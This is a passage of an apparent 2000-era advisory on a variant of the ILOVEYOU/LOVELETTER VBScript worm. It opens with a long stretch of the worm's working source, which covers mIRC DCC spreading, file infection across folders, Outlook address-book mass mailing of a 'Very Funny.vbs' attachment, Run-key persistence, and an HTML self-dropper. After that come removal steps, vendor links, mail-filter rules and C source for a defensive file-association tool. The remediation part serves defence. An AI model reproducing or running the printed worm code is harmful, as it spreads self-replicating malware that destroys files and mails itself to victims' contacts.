scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\Very Funny.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "fwd: Joke"
male.Body = vbcrlf&""
male.Attachments.Add(dirsystem&"\Very Funny.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\Very Funny.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\Very Funny.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
SOLUTION
Everyone should obtain and install the latest virus definition
files for their virus scanning software. Mail administrators
should filter out any email that has a .VBS attachment, or at
least any mail with a subject line of "ILOVEYOU".
Removing the virus is easy enough, but as another author said
("The Pope"), it is painful, and if you have useful VBScript, WSH
or other files of similar nature (listed below), you may have
already lost very valuable data. The steps are:
1. Remove the registry entries
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
2. Remove *all* instance of the following files:
LOVE-LETTER-FOR-YOU.HTM
*.vbs
*.vbs
*.vbe
*.js
*.jse
*.css
*.wsh
*.sct
*.hta
Find hidden files of .mp2 and .mp3 extensions, and remove the
"hidden" bit. It is also a good idea to clear the "documents"
folder. Some AV vendors with solutions for this problem:
Alladin: http://www.aks.com/home/csrt/valerts.asp
CA: http://www.ca.com/virusinfo/virusalert.htm
DrSolomon: http://www.drsolomons.com/home/extra.zip
F-Secure: http://www.f-secure.com/download-purchase/updates.html
Finjan: http://www.finjan.com/attack_release_detail.cfm?attack_release_id=34
McAffe: http://download.mcafee.com/extrafiles/love-4.zip
NAI: http://vil.nai.com/villib/dispVirus.asp?virus_k=98617
Proland: http://www.pspl.com/virus_info/worms/loveletter.htm
Sophos: http://www.sophos.com/virusinfo/analyses/vbsloveleta.html
Sophos: http://www.sophos.com/virusinfo/analyses/trojloveleta.html
Symantec: http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
TrendMicro: http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER-O
Jose Nazario has been kind enough to put up a rulseset for
sendmail 8.9.x and 8.10.x that stops messages with "ILOVEYOU" in
the subject file. You can find it at:
http://biocserver.cwru.edu/~jose/iloveyouhack.txt
Matt Davis points out that you can modify John D. Hardin's
procmail filters to stop the worm. You can find them at
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
Sendmail.com has a rule to filter the worm based on the subject
header at http://www2.sendmail.com/loveletter. It works with
Sendmail 8.9 and newer.
If you are a Postfix users you can stop the virus by doing the
following:
* Make sure your version of postfix supports the header_checks
directive.
* Add the line "header_checks = regexp:/etc/postfix/header_checks"
to your main.cf file.
* Create a /etc/postfix/header_checks file with a line of:
/^Subject:.*ILOVEYOU/ REJECT
or better yet
/Content.*\.vbs/ REJECT
* Execute "postfix reload".
For Exchange Steve Willocks recommends Mail essentials for
Exchange/SMTP. Its a commercial product that you configure to
block messages based on types of attachments or keyword matches
among other features. You can find it at www.gfi.com/mesindex.htm
At least in some intances it seems tabs in the virus code have
been changed to spaces. That means the code looks the same but
its not. Some antivirus products may be fooled by this. Trend
Micro Interscan for mail servers, Solaris version, seems to be
affected. Thanks to Brett Dikeman for pointing this out.
Anyway, while everyone has been scrambling east and west, north
and south trying to find the answer to these VBS viruses, the
answer is not eMail filtering, it's not better firewalls, or
failing members of the FBI community. It is a file called
WScript.Exe. A batch (.BAT) file with these two lines will deal
with this problem:
ren %SystemRoot%\system32\wscript.exe wscript.sav
ren c:\windows\wscript.exe wscript.sav
If you get rid of this engine, then all Visual Basic Scripts
cannot be run. This will only do 50% of the job. There is a 2nd
version of the scripting host with the name cscript.exe. This one
normally deals with commandline scripts (that is, scripts which
don't use their own window but send their output to a shell).
CSCRIPT.EXE is also attached to .vbs, .vbe, .jse etc. file types
through the registry.
If you want to get rid of wscript.exe under win2k, just delete
%systemroot%\system32\dllcache\wscript.exe first, and then
%systemroot%\system32\dllcache\wscript.exe. If you then simply
refuse to insert the Win2k CD when SFP asks for it, that file
will be marked as "not restored" somewhere within the bowels of
the registry, and SFP will (hopefully) continue to shut up about
it. This will also be visible in the Event Log.
The Cerberus Security Team have written a tool that will prevent
PC users from being infected by such viral worms as the now
infamous "I Love You" and its many variants and any others that
are still only a gleam in the eye of the budding virus writer.
These rely on basic default configurations of a standard
Microsoft box to be able to spread - and also a little help from
the user by actually opening the attachment! As many will be
aware 99% of files on a Windows machine have a three letter
extension. This extension tells Windows Explorer how to deal with
each file. For example, if you double click on a file with the
.txt extension Explorer will look in the Registry to see what
application to use to open it - notepad.exe in this case.
As far as the "I Love You" worm is concerned it has a .vbs
extension and so, when opened by the person it has been sent to,
Windows looks in the Regsitry to see what application it should
use to deal with the file - in this case wscript.exe. wscript.exe
is script interpreter and when passed the file it executes the
code it finds there - very much like what command.com or cmd.exe
does for batch (.bat) files. The tool the Cerberus Security Team
has written goes through the registry and removes these
application / file extention associations for VBS,VBE,WSF,WSH, JS
and JSE and any viruses or worms that rely on these associations
will therefore fail. These are all "dangerous" mappings and to
be perfectly frank most computers users never use the
functionality provided by these.
They provide the source code at the end of this mail and also
make the binary version available from their website:
http://www.cerberus-infosec.co.uk/vf.exe
It has been tested on Windows 98, Windows NT 4 and Windows 2000.
Though not yet tested on Windows 95 it should still work. Source:
////////////////////////////////////////////////////////////////////////////
////////
//
// compile with eg Visual C++ link with advapi32.lib
//
// Cerberus Information Security, Ltd
//
// 8th May 2000
//
////////////////////////////////////////////////////////////////////////////
/////////
#include <windows.h>
#include <stdio.h>
#include <winreg.h>
#define SUCCESS 1
#define FAILURE 0
HKEY KeyToChange = HKEY_CLASSES_ROOT;
int ChangeFileAssociations(void);
int ConnectToRemoteRegistry(char *);
LONG DoSetAKey(HKEY, char *, char *);
int main(int argc,char *argv[])
{
DWORD chk=0;
char hostname[260]="\\\\";
char *errors = "There were errors changing the file associations.\n";
char *noerrors = "VBS,VBE,WSF,WSH,JS and JSE file associations have been
changed.\n";
printf("\nCerberus Security Team\nhttp://www.cerberus-infosec.co.uk/\n8th
May 2000\n\n");
if(argc == 1)
{
chk = ChangeFileAssociations();
if(chk)
{
printf(noerrors);
return SUCCESS;
}
else
{
printf(errors);
return FAILURE;
}
}
else
{
if
( stricmp( argv[1], "/?" ) == 0 ) ||
( stricmp( argv[1], "-?" ) == 0 ) ||
( stricmp( argv[1], "/h" ) == 0 ) ||
( stricmp( argv[1], "-h" ) == 0 ) ||
( stricmp( argv[1], "?" ) == 0 ) ||
( stricmp( argv[1], "help" ) == 0 ) ||
( stricmp( argv[1], "/help" ) == 0 ))
{
return 0;
}
else
{
strncat(hostname,argv[1],250);
chk = ConnectToRemoteRegistry(hostname);
if (!chk)
{
printf("Error connecting to %s\n",hostname);
return FAILURE;
}
else
{
chk = ChangeFileAssociations();
if(chk)
{
printf(noerrors);
return SUCCESS;
}
else
{
printf(errors);
return FAILURE;
}
}
}
}
}
int ConnectToRemoteRegistry(char *host)
{
HKEY hkcr = HKEY_CLASSES_ROOT;
LONG connect;
connect = RegConnectRegistry(host,hkcr,&KeyToChange);
if(connect == ERROR_SUCCESS)
{
return SUCCESS;
}
else
{
return FAILURE;
}
}
int ChangeFileAssociations()
{
LONG chk=0;
chk = DoSetAKey(KeyToChange,"VBSFile\\Shell\\Open\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"VBSFile\\Shell\\Open2\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"WSHFile\\Shell\\Open\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"WSHFile\\Shell\\Open2\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"VBEFile\\Shell\\Open\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"VBEFile\\Shell\\Open2\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"WSFFile\\Shell\\Open\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"WSFFile\\Shell\\Open2\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"JSEFile\\Shell\\Open\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"JSEFile\\Shell\\Open2\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"JSFile\\Shell\\Open\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
chk = DoSetAKey(KeyToChange,"JSFile\\Shell\\Open2\\Command","Foobar");
if(chk != SUCCESS)
{
if(chk != ERROR_FILE_NOT_FOUND)
{
printf("Error %d\n",chk);
return FAILURE;
}
}
return SUCCESS;
}
LONG DoSetAKey(HKEY root, char *key, char *set)
{
HKEY hResult;
DWORD bufsize = MAX_PATH;
LONG nResult;
nResult = RegOpenKeyEx(root,key,0,KEY_WRITE,&hResult);
if(nResult != ERROR_SUCCESS)
{
if(nResult != ERROR_FILE_NOT_FOUND)
{
RegCloseKey(hResult);
return FAILURE;
}
else
{
return ERROR_FILE_NOT_FOUND;
}
}
nResult = RegSetValueEx(hResult,NULL,0,REG_MULTI_SZ,(CONST
BYTE*)set,strlen(set));
if(nResult != ERROR_SUCCESS)
{
RegCloseKey(hResult);
return FAILURE;
}
else
{
printf("Success\n");
RegCloseKey(hResult);
return SUCCESS;
}
}
Microsoft released the binaries for their Email Security Update.
Available now is a version for Outlook 98;
http://www.officeupdate.com/downloadDetails/Out98sec.htm
and Outlook 2000 SR-1:
http://www.officeupdate.com/2000/downloaddetails/Out2ksec.htm
Nothing is currently available to alter the way Outlook Express
works. These updates are strictly for Outlook 98/2000 SR-1. Note
that after installing the Outlook 98 Security Update on some test
workstations, you will find that it works as advertised on NT and
WIN 98 machines, but on the Win 95 machines, you can no longer
route documents from Word 97. When you try to route a document in
Word 97 via file-sendto-routing recipient, you will get the error
"YOUR MAIL SYSTEM DOES NOT SUPPORT CERTAIN SERVICES NEEDED FOR
DOCUMENT ROUTING".
Reliable Software Technologies released a new program designed to
prevent e-mail macro viruses from spreading. It can be used along
with or instead of the Microsoft supplied e-mail protection patch.
JustBeFriends works will all versions of Outlook and Outlook
Express, and is substantially simpler than the Microsoft patch.
For full details, see
http://www.rstcorp.com/news/jbf.html